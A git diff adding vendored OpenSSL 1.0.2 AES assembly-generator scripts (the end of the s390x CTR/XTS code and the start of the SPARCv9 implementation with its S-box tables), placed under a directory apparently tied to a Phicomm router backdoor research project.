+.Lctr32_kmctr_prepare:
+	stg	$iv0,0($s2)
+	stg	$ivp,8($s2)
+	la	$s2,16($s2)
+	ahi	$ivp,1		# 32-bit increment, preserves upper half
+	brct	$s3,.Lctr32_kmctr_prepare
+
+	#la	$inp,0($inp)	# inp
+	sllg	$len,$fp,4	# len
+	#la	$out,0($out)	# out
+	la	$s2,16($sp)	# iv
+	.long	0xb92da042	# kmctr $out,$s2,$inp
+	brc	1,.-4		# pay attention to "partial completion"
+
+	slgr	$s1,$fp
+	brc	1,.Lctr32_kmctr_loop	# not zero, no borrow
+	algr	$fp,$s1
+	lghi	$s1,0
+	brc	4+1,.Lctr32_kmctr_loop	# not zero
+
+	l${g}	$sp,0($sp)
+	lm${g}	%r6,$s3,6*$SIZE_T($sp)
+	br	$ra
+.align	16
+___
+$code.=<<___;
+.Lctr32_km_loop:
+	la	$s2,16($sp)
+	lgr	$s3,$fp
+.Lctr32_km_prepare:
+	stg	$iv0,0($s2)
+	stg	$ivp,8($s2)
+	la	$s2,16($s2)
+	ahi	$ivp,1		# 32-bit increment, preserves upper half
+	brct	$s3,.Lctr32_km_prepare
+
+	la	$s0,16($sp)	# inp
+	sllg	$s1,$fp,4	# len
+	la	$s2,16($sp)	# out
+	.long	0xb92e00a8	# km %r10,%r8
+	brc	1,.-4		# pay attention to "partial completion"
+
+	la	$s2,16($sp)
+	lgr	$s3,$fp
+	slgr	$s2,$inp
+.Lctr32_km_xor:
+	lg	$s0,0($inp)
+	lg	$s1,8($inp)
+	xg	$s0,0($s2,$inp)
+	xg	$s1,8($s2,$inp)
+	stg	$s0,0($out,$inp)
+	stg	$s1,8($out,$inp)
+	la	$inp,16($inp)
+	brct	$s3,.Lctr32_km_xor
+
+	slgr	$len,$fp
+	brc	1,.Lctr32_km_loop	# not zero, no borrow
+	algr	$fp,$len
+	lghi	$len,0
+	brc	4+1,.Lctr32_km_loop	# not zero
+
+	l${g}	$s0,0($sp)
+	l${g}	$s1,$SIZE_T($sp)
+	la	$s2,16($sp)
+.Lctr32_km_zap:
+	stg	$s0,0($s2)
+	stg	$s0,8($s2)
+	la	$s2,16($s2)
+	brct	$s1,.Lctr32_km_zap
+
+	la	$sp,0($s0)
+	lm${g}	%r6,$s3,6*$SIZE_T($sp)
+	br	$ra
+.align	16
+.Lctr32_software:
+___
+$code.=<<___;
+	stm${g}	$key,$ra,5*$SIZE_T($sp)
+	sl${g}r	$inp,$out
+	larl	$tbl,AES_Te
+	llgf	$t1,12($ivp)
+
+.Lctr32_loop:
+	stm${g}	$inp,$out,2*$SIZE_T($sp)
+	llgf	$s0,0($ivp)
+	llgf	$s1,4($ivp)
+	llgf	$s2,8($ivp)
+	lgr	$s3,$t1
+	st	$t1,16*$SIZE_T($sp)
+	lgr	%r4,$key
+
+	bras	$ra,_s390x_AES_encrypt
+
+	lm${g}	$inp,$ivp,2*$SIZE_T($sp)
+	llgf	$t1,16*$SIZE_T($sp)
+	x	$s0,0($inp,$out)
+	x	$s1,4($inp,$out)
+	x	$s2,8($inp,$out)
+	x	$s3,12($inp,$out)
+	stm	$s0,$s3,0($out)
+
+	la	$out,16($out)
+	ahi	$t1,1		# 32-bit increment
+	brct	$len,.Lctr32_loop
+
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	br	$ra
+.size	AES_ctr32_encrypt,.-AES_ctr32_encrypt
+___
+}
+
+########################################################################
+# void AES_xts_encrypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2,
+#	const unsigned char iv[16]);
+#
+{
+my $inp="%r2";
+my $out="%r4";	# len and out are swapped
+my $len="%r3";
+my $key1="%r5";	# $i1
+my $key2="%r6";	# $i2
+my $fp="%r7";	# $i3
+my $tweak=16*$SIZE_T+16;	# or $stdframe-16, bottom of the frame...
+
+$code.=<<___;
+.type	_s390x_xts_km,\@function
+.align	16
+_s390x_xts_km:
+___
+$code.=<<___ if(1);
+	llgfr	$s0,%r0			# put aside the function code
+	lghi	$s1,0x7f
+	nr	$s1,%r0
+	lghi	%r0,0			# query capability vector
+	la	%r1,$tweak-16($sp)
+	.long	0xb92e0042		# km %r4,%r2
+	llihh	%r1,0x8000
+	srlg	%r1,%r1,32($s1)		# check for 32+function code
+	ng	%r1,$tweak-16($sp)
+	lgr	%r0,$s0			# restore the function code
+	la	%r1,0($key1)		# restore $key1
+	jz	.Lxts_km_vanilla
+
+	lmg	$i2,$i3,$tweak($sp)	# put aside the tweak value
+	algr	$out,$inp
+
+	oill	%r0,32			# switch to xts function code
+	aghi	$s1,-18			#
+	sllg	$s1,$s1,3		# (function code - 18)*8, 0 or 16
+	la	%r1,$tweak-16($sp)
+	slgr	%r1,$s1			# parameter block position
+	lmg	$s0,$s3,0($key1)	# load 256 bits of key material,
+	stmg	$s0,$s3,0(%r1)		# and copy it to parameter block.
+					# yes, it contains junk and overlaps
+					# with the tweak in 128-bit case.
+					# it's done to avoid conditional
+					# branch.
+	stmg	$i2,$i3,$tweak($sp)	# "re-seat" the tweak value
+
+	.long	0xb92e0042		# km %r4,%r2
+	brc	1,.-4			# pay attention to "partial completion"
+
+	lrvg	$s0,$tweak+0($sp)	# load the last tweak
+	lrvg	$s1,$tweak+8($sp)
+	stmg	%r0,%r3,$tweak-32($sp)	# wipe copy of the key
+
+	nill	%r0,0xffdf		# switch back to original function code
+	la	%r1,0($key1)		# restore pointer to $key1
+	slgr	$out,$inp
+
+	llgc	$len,2*$SIZE_T-1($sp)
+	nill	$len,0x0f		# $len%=16
+	br	$ra
+	
+.align	16
+.Lxts_km_vanilla:
+___
+$code.=<<___;
+	# prepare and allocate stack frame at the top of 4K page
+	# with 1K reserved for eventual signal handling
+	lghi	$s0,-1024-256-16# guarantee at least 256-bytes buffer
+	lghi	$s1,-4096
+	algr	$s0,$sp
+	lgr	$fp,$sp
+	ngr	$s0,$s1		# align at page boundary
+	slgr	$fp,$s0		# total buffer size
+	lgr	$s2,$sp
+	lghi	$s1,1024+16	# sl[g]fi is extended-immediate facility
+	slgr	$fp,$s1		# deduct reservation to get usable buffer size
+	# buffer size is at lest 256 and at most 3072+256-16
+
+	la	$sp,1024($s0)	# alloca
+	nill	$fp,0xfff0	# round to 16*n
+	st${g}	$s2,0($sp)	# back-chain
+	nill	$len,0xfff0	# redundant
+	st${g}	$fp,$SIZE_T($sp)
+
+	slgr	$len,$fp
+	brc	1,.Lxts_km_go	# not zero, no borrow
+	algr	$fp,$len	# input is shorter than allocated buffer
+	lghi	$len,0
+	st${g}	$fp,$SIZE_T($sp)
+
+.Lxts_km_go:
+	lrvg	$s0,$tweak+0($s2)	# load the tweak value in little-endian
+	lrvg	$s1,$tweak+8($s2)
+
+	la	$s2,16($sp)		# vector of ascending tweak values
+	slgr	$s2,$inp
+	srlg	$s3,$fp,4
+	j	.Lxts_km_start
+
+.Lxts_km_loop:
+	la	$s2,16($sp)
+	slgr	$s2,$inp
+	srlg	$s3,$fp,4
+.Lxts_km_prepare:
+	lghi	$i1,0x87
+	srag	$i2,$s1,63		# broadcast upper bit
+	ngr	$i1,$i2			# rem
+	algr	$s0,$s0
+	alcgr	$s1,$s1
+	xgr	$s0,$i1
+.Lxts_km_start:
+	lrvgr	$i1,$s0			# flip byte order
+	lrvgr	$i2,$s1
+	stg	$i1,0($s2,$inp)
+	stg	$i2,8($s2,$inp)
+	xg	$i1,0($inp)
+	xg	$i2,8($inp)
+	stg	$i1,0($out,$inp)
+	stg	$i2,8($out,$inp)
+	la	$inp,16($inp)
+	brct	$s3,.Lxts_km_prepare
+
+	slgr	$inp,$fp		# rewind $inp
+	la	$s2,0($out,$inp)
+	lgr	$s3,$fp
+	.long	0xb92e00aa		# km $s2,$s2
+	brc	1,.-4			# pay attention to "partial completion"
+
+	la	$s2,16($sp)
+	slgr	$s2,$inp
+	srlg	$s3,$fp,4
+.Lxts_km_xor:
+	lg	$i1,0($out,$inp)
+	lg	$i2,8($out,$inp)
+	xg	$i1,0($s2,$inp)
+	xg	$i2,8($s2,$inp)
+	stg	$i1,0($out,$inp)
+	stg	$i2,8($out,$inp)
+	la	$inp,16($inp)
+	brct	$s3,.Lxts_km_xor
+
+	slgr	$len,$fp
+	brc	1,.Lxts_km_loop		# not zero, no borrow
+	algr	$fp,$len
+	lghi	$len,0
+	brc	4+1,.Lxts_km_loop	# not zero
+
+	l${g}	$i1,0($sp)		# back-chain
+	llgf	$fp,`2*$SIZE_T-4`($sp)	# bytes used
+	la	$i2,16($sp)
+	srlg	$fp,$fp,4
+.Lxts_km_zap:
+	stg	$i1,0($i2)
+	stg	$i1,8($i2)
+	la	$i2,16($i2)
+	brct	$fp,.Lxts_km_zap
+
+	la	$sp,0($i1)
+	llgc	$len,2*$SIZE_T-1($i1)
+	nill	$len,0x0f		# $len%=16
+	bzr	$ra
+
+	# generate one more tweak...
+	lghi	$i1,0x87
+	srag	$i2,$s1,63		# broadcast upper bit
+	ngr	$i1,$i2			# rem
+	algr	$s0,$s0
+	alcgr	$s1,$s1
+	xgr	$s0,$i1
+
+	ltr	$len,$len		# clear zero flag
+	br	$ra
+.size	_s390x_xts_km,.-_s390x_xts_km
+
+.globl	AES_xts_encrypt
+.type	AES_xts_encrypt,\@function
+.align	16
+AES_xts_encrypt:
+	xgr	%r3,%r4			# flip %r3 and %r4, $out and $len
+	xgr	%r4,%r3
+	xgr	%r3,%r4
+___
+$code.=<<___ if ($SIZE_T==4);
+	llgfr	$len,$len
+___
+$code.=<<___;
+	st${g}	$len,1*$SIZE_T($sp)	# save copy of $len
+	srag	$len,$len,4		# formally wrong, because it expands
+					# sign byte, but who can afford asking
+					# to process more than 2^63-1 bytes?
+					# I use it, because it sets condition
+					# code...
+	bcr	8,$ra			# abort if zero (i.e. less than 16)
+___
+$code.=<<___ if (!$softonly);
+	llgf	%r0,240($key2)
+	lhi	%r1,16
+	clr	%r0,%r1
+	jl	.Lxts_enc_software
+
+	st${g}	$ra,5*$SIZE_T($sp)
+	stm${g}	%r6,$s3,6*$SIZE_T($sp)
+
+	sllg	$len,$len,4		# $len&=~15
+	slgr	$out,$inp
+
+	# generate the tweak value
+	l${g}	$s3,$stdframe($sp)	# pointer to iv
+	la	$s2,$tweak($sp)
+	lmg	$s0,$s1,0($s3)
+	lghi	$s3,16
+	stmg	$s0,$s1,0($s2)
+	la	%r1,0($key2)		# $key2 is not needed anymore
+	.long	0xb92e00aa		# km $s2,$s2, generate the tweak
+	brc	1,.-4			# can this happen?
+
+	l	%r0,240($key1)
+	la	%r1,0($key1)		# $key1 is not needed anymore
+	bras	$ra,_s390x_xts_km
+	jz	.Lxts_enc_km_done
+
+	aghi	$inp,-16		# take one step back
+	la	$i3,0($out,$inp)	# put aside real $out
+.Lxts_enc_km_steal:
+	llgc	$i1,16($inp)
+	llgc	$i2,0($out,$inp)
+	stc	$i1,0($out,$inp)
+	stc	$i2,16($out,$inp)
+	la	$inp,1($inp)
+	brct	$len,.Lxts_enc_km_steal
+
+	la	$s2,0($i3)
+	lghi	$s3,16
+	lrvgr	$i1,$s0			# flip byte order
+	lrvgr	$i2,$s1
+	xg	$i1,0($s2)
+	xg	$i2,8($s2)
+	stg	$i1,0($s2)
+	stg	$i2,8($s2)
+	.long	0xb92e00aa		# km $s2,$s2
+	brc	1,.-4			# can this happen?
+	lrvgr	$i1,$s0			# flip byte order
+	lrvgr	$i2,$s1
+	xg	$i1,0($i3)
+	xg	$i2,8($i3)
+	stg	$i1,0($i3)
+	stg	$i2,8($i3)
+
+.Lxts_enc_km_done:
+	stg	$sp,$tweak+0($sp)	# wipe tweak
+	stg	$sp,$tweak+8($sp)
+	l${g}	$ra,5*$SIZE_T($sp)
+	lm${g}	%r6,$s3,6*$SIZE_T($sp)
+	br	$ra
+.align	16
+.Lxts_enc_software:
+___
+$code.=<<___;
+	stm${g}	%r6,$ra,6*$SIZE_T($sp)
+
+	slgr	$out,$inp
+
+	l${g}	$s3,$stdframe($sp)	# ivp
+	llgf	$s0,0($s3)		# load iv
+	llgf	$s1,4($s3)
+	llgf	$s2,8($s3)
+	llgf	$s3,12($s3)
+	stm${g}	%r2,%r5,2*$SIZE_T($sp)
+	la	$key,0($key2)
+	larl	$tbl,AES_Te
+	bras	$ra,_s390x_AES_encrypt	# generate the tweak
+	lm${g}	%r2,%r5,2*$SIZE_T($sp)
+	stm	$s0,$s3,$tweak($sp)	# save the tweak
+	j	.Lxts_enc_enter
+
+.align	16
+.Lxts_enc_loop:
+	lrvg	$s1,$tweak+0($sp)	# load the tweak in little-endian
+	lrvg	$s3,$tweak+8($sp)
+	lghi	%r1,0x87
+	srag	%r0,$s3,63		# broadcast upper bit
+	ngr	%r1,%r0			# rem
+	algr	$s1,$s1
+	alcgr	$s3,$s3
+	xgr	$s1,%r1
+	lrvgr	$s1,$s1			# flip byte order
+	lrvgr	$s3,$s3
+	srlg	$s0,$s1,32		# smash the tweak to 4x32-bits 
+	stg	$s1,$tweak+0($sp)	# save the tweak
+	llgfr	$s1,$s1
+	srlg	$s2,$s3,32
+	stg	$s3,$tweak+8($sp)
+	llgfr	$s3,$s3
+	la	$inp,16($inp)		# $inp+=16
+.Lxts_enc_enter:
+	x	$s0,0($inp)		# ^=*($inp)
+	x	$s1,4($inp)
+	x	$s2,8($inp)
+	x	$s3,12($inp)
+	stm${g}	%r2,%r3,2*$SIZE_T($sp)	# only two registers are changing
+	la	$key,0($key1)
+	bras	$ra,_s390x_AES_encrypt
+	lm${g}	%r2,%r5,2*$SIZE_T($sp)
+	x	$s0,$tweak+0($sp)	# ^=tweak
+	x	$s1,$tweak+4($sp)
+	x	$s2,$tweak+8($sp)
+	x	$s3,$tweak+12($sp)
+	st	$s0,0($out,$inp)
+	st	$s1,4($out,$inp)
+	st	$s2,8($out,$inp)
+	st	$s3,12($out,$inp)
+	brct${g}	$len,.Lxts_enc_loop
+
+	llgc	$len,`2*$SIZE_T-1`($sp)
+	nill	$len,0x0f		# $len%16
+	jz	.Lxts_enc_done
+
+	la	$i3,0($inp,$out)	# put aside real $out
+.Lxts_enc_steal:
+	llgc	%r0,16($inp)
+	llgc	%r1,0($out,$inp)
+	stc	%r0,0($out,$inp)
+	stc	%r1,16($out,$inp)
+	la	$inp,1($inp)
+	brct	$len,.Lxts_enc_steal
+	la	$out,0($i3)		# restore real $out
+
+	# generate last tweak...
+	lrvg	$s1,$tweak+0($sp)	# load the tweak in little-endian
+	lrvg	$s3,$tweak+8($sp)
+	lghi	%r1,0x87
+	srag	%r0,$s3,63		# broadcast upper bit
+	ngr	%r1,%r0			# rem
+	algr	$s1,$s1
+	alcgr	$s3,$s3
+	xgr	$s1,%r1
+	lrvgr	$s1,$s1			# flip byte order
+	lrvgr	$s3,$s3
+	srlg	$s0,$s1,32		# smash the tweak to 4x32-bits 
+	stg	$s1,$tweak+0($sp)	# save the tweak
+	llgfr	$s1,$s1
+	srlg	$s2,$s3,32
+	stg	$s3,$tweak+8($sp)
+	llgfr	$s3,$s3
+
+	x	$s0,0($out)		# ^=*(inp)|stolen cipther-text
+	x	$s1,4($out)
+	x	$s2,8($out)
+	x	$s3,12($out)
+	st${g}	$out,4*$SIZE_T($sp)
+	la	$key,0($key1)
+	bras	$ra,_s390x_AES_encrypt
+	l${g}	$out,4*$SIZE_T($sp)
+	x	$s0,`$tweak+0`($sp)	# ^=tweak
+	x	$s1,`$tweak+4`($sp)
+	x	$s2,`$tweak+8`($sp)
+	x	$s3,`$tweak+12`($sp)
+	st	$s0,0($out)
+	st	$s1,4($out)
+	st	$s2,8($out)
+	st	$s3,12($out)
+
+.Lxts_enc_done:
+	stg	$sp,$tweak+0($sp)	# wipe tweak
+	stg	$sp,$twesk+8($sp)
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	br	$ra
+.size	AES_xts_encrypt,.-AES_xts_encrypt
+___
+# void AES_xts_decrypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2,
+#	const unsigned char iv[16]);
+#
+$code.=<<___;
+.globl	AES_xts_decrypt
+.type	AES_xts_decrypt,\@function
+.align	16
+AES_xts_decrypt:
+	xgr	%r3,%r4			# flip %r3 and %r4, $out and $len
+	xgr	%r4,%r3
+	xgr	%r3,%r4
+___
+$code.=<<___ if ($SIZE_T==4);
+	llgfr	$len,$len
+___
+$code.=<<___;
+	st${g}	$len,1*$SIZE_T($sp)	# save copy of $len
+	aghi	$len,-16
+	bcr	4,$ra			# abort if less than zero. formally
+					# wrong, because $len is unsigned,
+					# but who can afford asking to
+					# process more than 2^63-1 bytes?
+	tmll	$len,0x0f
+	jnz	.Lxts_dec_proceed
+	aghi	$len,16
+.Lxts_dec_proceed:
+___
+$code.=<<___ if (!$softonly);
+	llgf	%r0,240($key2)
+	lhi	%r1,16
+	clr	%r0,%r1
+	jl	.Lxts_dec_software
+
+	st${g}	$ra,5*$SIZE_T($sp)
+	stm${g}	%r6,$s3,6*$SIZE_T($sp)
+
+	nill	$len,0xfff0		# $len&=~15
+	slgr	$out,$inp
+
+	# generate the tweak value
+	l${g}	$s3,$stdframe($sp)	# pointer to iv
+	la	$s2,$tweak($sp)
+	lmg	$s0,$s1,0($s3)
+	lghi	$s3,16
+	stmg	$s0,$s1,0($s2)
+	la	%r1,0($key2)		# $key2 is not needed past this point
+	.long	0xb92e00aa		# km $s2,$s2, generate the tweak
+	brc	1,.-4			# can this happen?
+
+	l	%r0,240($key1)
+	la	%r1,0($key1)		# $key1 is not needed anymore
+
+	ltgr	$len,$len
+	jz	.Lxts_dec_km_short
+	bras	$ra,_s390x_xts_km
+	jz	.Lxts_dec_km_done
+
+	lrvgr	$s2,$s0			# make copy in reverse byte order
+	lrvgr	$s3,$s1
+	j	.Lxts_dec_km_2ndtweak
+
+.Lxts_dec_km_short:
+	llgc	$len,`2*$SIZE_T-1`($sp)
+	nill	$len,0x0f		# $len%=16
+	lrvg	$s0,$tweak+0($sp)	# load the tweak
+	lrvg	$s1,$tweak+8($sp)
+	lrvgr	$s2,$s0			# make copy in reverse byte order
+	lrvgr	$s3,$s1
+
+.Lxts_dec_km_2ndtweak:
+	lghi	$i1,0x87
+	srag	$i2,$s1,63		# broadcast upper bit
+	ngr	$i1,$i2			# rem
+	algr	$s0,$s0
+	alcgr	$s1,$s1
+	xgr	$s0,$i1
+	lrvgr	$i1,$s0			# flip byte order
+	lrvgr	$i2,$s1
+
+	xg	$i1,0($inp)
+	xg	$i2,8($inp)
+	stg	$i1,0($out,$inp)
+	stg	$i2,8($out,$inp)
+	la	$i2,0($out,$inp)
+	lghi	$i3,16
+	.long	0xb92e0066		# km $i2,$i2
+	brc	1,.-4			# can this happen?
+	lrvgr	$i1,$s0
+	lrvgr	$i2,$s1
+	xg	$i1,0($out,$inp)
+	xg	$i2,8($out,$inp)
+	stg	$i1,0($out,$inp)
+	stg	$i2,8($out,$inp)
+
+	la	$i3,0($out,$inp)	# put aside real $out
+.Lxts_dec_km_steal:
+	llgc	$i1,16($inp)
+	llgc	$i2,0($out,$inp)
+	stc	$i1,0($out,$inp)
+	stc	$i2,16($out,$inp)
+	la	$inp,1($inp)
+	brct	$len,.Lxts_dec_km_steal
+
+	lgr	$s0,$s2
+	lgr	$s1,$s3
+	xg	$s0,0($i3)
+	xg	$s1,8($i3)
+	stg	$s0,0($i3)
+	stg	$s1,8($i3)
+	la	$s0,0($i3)
+	lghi	$s1,16
+	.long	0xb92e0088		# km $s0,$s0
+	brc	1,.-4			# can this happen?
+	xg	$s2,0($i3)
+	xg	$s3,8($i3)
+	stg	$s2,0($i3)
+	stg	$s3,8($i3)
+.Lxts_dec_km_done:
+	stg	$sp,$tweak+0($sp)	# wipe tweak
+	stg	$sp,$tweak+8($sp)
+	l${g}	$ra,5*$SIZE_T($sp)
+	lm${g}	%r6,$s3,6*$SIZE_T($sp)
+	br	$ra
+.align	16
+.Lxts_dec_software:
+___
+$code.=<<___;
+	stm${g}	%r6,$ra,6*$SIZE_T($sp)
+
+	srlg	$len,$len,4
+	slgr	$out,$inp
+
+	l${g}	$s3,$stdframe($sp)	# ivp
+	llgf	$s0,0($s3)		# load iv
+	llgf	$s1,4($s3)
+	llgf	$s2,8($s3)
+	llgf	$s3,12($s3)
+	stm${g}	%r2,%r5,2*$SIZE_T($sp)
+	la	$key,0($key2)
+	larl	$tbl,AES_Te
+	bras	$ra,_s390x_AES_encrypt	# generate the tweak
+	lm${g}	%r2,%r5,2*$SIZE_T($sp)
+	larl	$tbl,AES_Td
+	lt${g}r	$len,$len
+	stm	$s0,$s3,$tweak($sp)	# save the tweak
+	jz	.Lxts_dec_short
+	j	.Lxts_dec_enter
+
+.align	16
+.Lxts_dec_loop:
+	lrvg	$s1,$tweak+0($sp)	# load the tweak in little-endian
+	lrvg	$s3,$tweak+8($sp)
+	lghi	%r1,0x87
+	srag	%r0,$s3,63		# broadcast upper bit
+	ngr	%r1,%r0			# rem
+	algr	$s1,$s1
+	alcgr	$s3,$s3
+	xgr	$s1,%r1
+	lrvgr	$s1,$s1			# flip byte order
+	lrvgr	$s3,$s3
+	srlg	$s0,$s1,32		# smash the tweak to 4x32-bits 
+	stg	$s1,$tweak+0($sp)	# save the tweak
+	llgfr	$s1,$s1
+	srlg	$s2,$s3,32
+	stg	$s3,$tweak+8($sp)
+	llgfr	$s3,$s3
+.Lxts_dec_enter:
+	x	$s0,0($inp)		# tweak^=*(inp)
+	x	$s1,4($inp)
+	x	$s2,8($inp)
+	x	$s3,12($inp)
+	stm${g}	%r2,%r3,2*$SIZE_T($sp)	# only two registers are changing
+	la	$key,0($key1)
+	bras	$ra,_s390x_AES_decrypt
+	lm${g}	%r2,%r5,2*$SIZE_T($sp)
+	x	$s0,$tweak+0($sp)	# ^=tweak
+	x	$s1,$tweak+4($sp)
+	x	$s2,$tweak+8($sp)
+	x	$s3,$tweak+12($sp)
+	st	$s0,0($out,$inp)
+	st	$s1,4($out,$inp)
+	st	$s2,8($out,$inp)
+	st	$s3,12($out,$inp)
+	la	$inp,16($inp)
+	brct${g}	$len,.Lxts_dec_loop
+
+	llgc	$len,`2*$SIZE_T-1`($sp)
+	nill	$len,0x0f		# $len%16
+	jz	.Lxts_dec_done
+
+	# generate pair of tweaks...
+	lrvg	$s1,$tweak+0($sp)	# load the tweak in little-endian
+	lrvg	$s3,$tweak+8($sp)
+	lghi	%r1,0x87
+	srag	%r0,$s3,63		# broadcast upper bit
+	ngr	%r1,%r0			# rem
+	algr	$s1,$s1
+	alcgr	$s3,$s3
+	xgr	$s1,%r1
+	lrvgr	$i2,$s1			# flip byte order
+	lrvgr	$i3,$s3
+	stmg	$i2,$i3,$tweak($sp)	# save the 1st tweak
+	j	.Lxts_dec_2ndtweak
+
+.align	16
+.Lxts_dec_short:
+	llgc	$len,`2*$SIZE_T-1`($sp)
+	nill	$len,0x0f		# $len%16
+	lrvg	$s1,$tweak+0($sp)	# load the tweak in little-endian
+	lrvg	$s3,$tweak+8($sp)
+.Lxts_dec_2ndtweak:
+	lghi	%r1,0x87
+	srag	%r0,$s3,63		# broadcast upper bit
+	ngr	%r1,%r0			# rem
+	algr	$s1,$s1
+	alcgr	$s3,$s3
+	xgr	$s1,%r1
+	lrvgr	$s1,$s1			# flip byte order
+	lrvgr	$s3,$s3
+	srlg	$s0,$s1,32		# smash the tweak to 4x32-bits
+	stg	$s1,$tweak-16+0($sp)	# save the 2nd tweak
+	llgfr	$s1,$s1
+	srlg	$s2,$s3,32
+	stg	$s3,$tweak-16+8($sp)
+	llgfr	$s3,$s3
+
+	x	$s0,0($inp)		# tweak_the_2nd^=*(inp)
+	x	$s1,4($inp)
+	x	$s2,8($inp)
+	x	$s3,12($inp)
+	stm${g}	%r2,%r3,2*$SIZE_T($sp)
+	la	$key,0($key1)
+	bras	$ra,_s390x_AES_decrypt
+	lm${g}	%r2,%r5,2*$SIZE_T($sp)
+	x	$s0,$tweak-16+0($sp)	# ^=tweak_the_2nd
+	x	$s1,$tweak-16+4($sp)
+	x	$s2,$tweak-16+8($sp)
+	x	$s3,$tweak-16+12($sp)
+	st	$s0,0($out,$inp)
+	st	$s1,4($out,$inp)
+	st	$s2,8($out,$inp)
+	st	$s3,12($out,$inp)
+
+	la	$i3,0($out,$inp)	# put aside real $out
+.Lxts_dec_steal:
+	llgc	%r0,16($inp)
+	llgc	%r1,0($out,$inp)
+	stc	%r0,0($out,$inp)
+	stc	%r1,16($out,$inp)
+	la	$inp,1($inp)
+	brct	$len,.Lxts_dec_steal
+	la	$out,0($i3)		# restore real $out
+
+	lm	$s0,$s3,$tweak($sp)	# load the 1st tweak
+	x	$s0,0($out)		# tweak^=*(inp)|stolen cipher-text
+	x	$s1,4($out)
+	x	$s2,8($out)
+	x	$s3,12($out)
+	st${g}	$out,4*$SIZE_T($sp)
+	la	$key,0($key1)
+	bras	$ra,_s390x_AES_decrypt
+	l${g}	$out,4*$SIZE_T($sp)
+	x	$s0,$tweak+0($sp)	# ^=tweak
+	x	$s1,$tweak+4($sp)
+	x	$s2,$tweak+8($sp)
+	x	$s3,$tweak+12($sp)
+	st	$s0,0($out)
+	st	$s1,4($out)
+	st	$s2,8($out)
+	st	$s3,12($out)
+	stg	$sp,$tweak-16+0($sp)	# wipe 2nd tweak
+	stg	$sp,$tweak-16+8($sp)
+.Lxts_dec_done:
+	stg	$sp,$tweak+0($sp)	# wipe tweak
+	stg	$sp,$twesk+8($sp)
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	br	$ra
+.size	AES_xts_decrypt,.-AES_xts_decrypt
+___
+}
+$code.=<<___;
+.string	"AES for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+.comm	OPENSSL_s390xcap_P,16,8
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;	# force flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-sparcv9.pl
new file mode 100755
index 0000000..403c4d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-sparcv9.pl
@@ -0,0 +1,1182 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. Rights for redistribution and usage in source and binary
+# forms are granted according to the OpenSSL license.
+# ====================================================================
+#
+# Version 1.1
+#
+# The major reason for undertaken effort was to mitigate the hazard of
+# cache-timing attack. This is [currently and initially!] addressed in
+# two ways. 1. S-boxes are compressed from 5KB to 2KB+256B size each.
+# 2. References to them are scheduled for L2 cache latency, meaning
+# that the tables don't have to reside in L1 cache. Once again, this
+# is an initial draft and one should expect more countermeasures to
+# be implemented...
+#
+# Version 1.1 prefetches T[ed]4 in order to mitigate attack on last
+# round.
+#
+# Even though performance was not the primary goal [on the contrary,
+# extra shifts "induced" by compressed S-box and longer loop epilogue
+# "induced" by scheduling for L2 have negative effect on performance],
+# the code turned out to run in ~23 cycles per processed byte en-/
+# decrypted with 128-bit key. This is pretty good result for code
+# with mentioned qualities and UltraSPARC core. Compared to Sun C
+# generated code my encrypt procedure runs just few percents faster,
+# while decrypt one - whole 50% faster [yes, Sun C failed to generate
+# optimal decrypt procedure]. Compared to GNU C generated code both
+# procedures are more than 60% faster:-)
+
+$bits=32;
+for (@ARGV)	{ $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+if ($bits==64)	{ $bias=2047; $frame=192; }
+else		{ $bias=0;    $frame=112; }
+$locals=16;
+
+$acc0="%l0";
+$acc1="%o0";
+$acc2="%o1";
+$acc3="%o2";
+
+$acc4="%l1";
+$acc5="%o3";
+$acc6="%o4";
+$acc7="%o5";
+
+$acc8="%l2";
+$acc9="%o7";
+$acc10="%g1";
+$acc11="%g2";
+
+$acc12="%l3";
+$acc13="%g3";
+$acc14="%g4";
+$acc15="%g5";
+
+$t0="%l4";
+$t1="%l5";
+$t2="%l6";
+$t3="%l7";
+
+$s0="%i0";
+$s1="%i1";
+$s2="%i2";
+$s3="%i3";
+$tbl="%i4";
+$key="%i5";
+$rounds="%i7";	# aliases with return address, which is off-loaded to stack
+
+sub _data_word()
+{ my $i;
+    while(defined($i=shift)) { $code.=sprintf"\t.long\t0x%08x,0x%08x\n",$i,$i; }
+}
+
+$code.=<<___ if ($bits==64);
+.register	%g2,#scratch
+.register	%g3,#scratch
+___
+$code.=<<___;
+.section	".text",#alloc,#execinstr
+
+.align	256
+AES_Te:
+___
+&_data_word(
+	0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d,
+	0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554,
+	0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d,
+	0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a,
+	0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87,
+	0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b,
+	0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea,
+	0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b,
+	0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a,
+	0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f,
+	0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108,
+	0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f,
+	0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e,
+	0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5,
